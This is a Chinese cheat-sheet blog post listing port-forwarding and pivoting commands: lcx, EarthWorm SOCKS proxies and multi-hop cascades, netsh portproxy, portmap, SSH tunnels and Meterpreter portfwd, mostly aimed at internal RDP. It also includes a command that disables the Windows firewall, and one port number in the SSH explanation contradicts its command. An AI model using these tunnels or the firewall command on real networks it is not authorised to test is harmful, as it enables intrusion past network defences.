利用 lcx ew netsh portmap ssh portfwd 等工具进行端口转发
lcx
lcx.exe -listen 8888 1234
lcx.exe -slave 192.168.1.100 8888 127.0.0.1 3389
ew
正向 socks 代理
ew.exe -s ssocksd -l 1080
反向 socks 代理
ew.exe -s rcsocks -l 10080 -e 8888
ew.exe -s rssocks -d 192.168.1.100 -e 8888
端口转发
ew.exe -s lcx_listen -l 1234 -e 8888
ew.exe -s lcx_slave -d 192.168.1.100 -e 8888 -f 127.0.0.1 -g 3389
多级级联
a: 192.168.1.100
b: 192.168.1.101,10.0.0.1
c: 10.0.0.2,172.16.0.1
d: 172.16.0.2
a: ew.exe -s lcx_listen -l 1234 -e 8888
b: ew.exe -s lcx_slave -d 192.168.1.100 -e 8888 -f 10.0.0.2 -g 9999
c: ew.exe -s lcx_tran -l 9999 -f 172.16.0.2 -g 3389
netsh
原理同 ew 中的 lcx_tran
重启后依然生效.
netsh interface portproxy set v4tov4 listenaddress=192.168.1.101 listenport=1234 connectaddress=10.0.0.1 connectport=3389
删除.
netsh interface portproxy delete v4tov4 listenaddress=192.168.1.101 listenport=1234
关闭防火墙.
netsh firewall set opmode disabled
portmap
垃圾.
listen
./portmap -m 2 -p1 1234 -p2 8888
slave
./portmap -m 3 -h1 192.168.1.100 -p1 8888 -h2 127.0.0.1 -p2 3389
tran
./portmap -m 1 -p1 1234 -h2 127.0.0.1 -p2 3389
ssh
a: 192.168.1.100
b: 192.168.1.101,10.0.0.1
c: 10.0.0.2
本地端口转发
a: ssh -CfNg -L 1234:10.0.0.2:3389 [email protected]
a 上 1234 端口的数据通过 b 被转发到 c 上的 3389 端口.
远程端口转发
a: ssh -CfNg -R 1234:192.168.1.100:3389 [email protected]
b 的 1234 端口的数据被转发到 a 上的 3389 端口, c 作为客户端访问 b.
socks 代理
a: ssh -qTfnN -D 1080 192.168.1.101
a 上架设 socks 代理, 端口 1800, 数据通过 b 转发到内网的任何一台机器上.
portfwd
portfwd add -l 1234 -r 192.168.1.100 -p 3389
删除.
portfwd del -l 1234
reDuh reGeorg Tunna
略.
- By:X1r0z[exp10it.cn]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论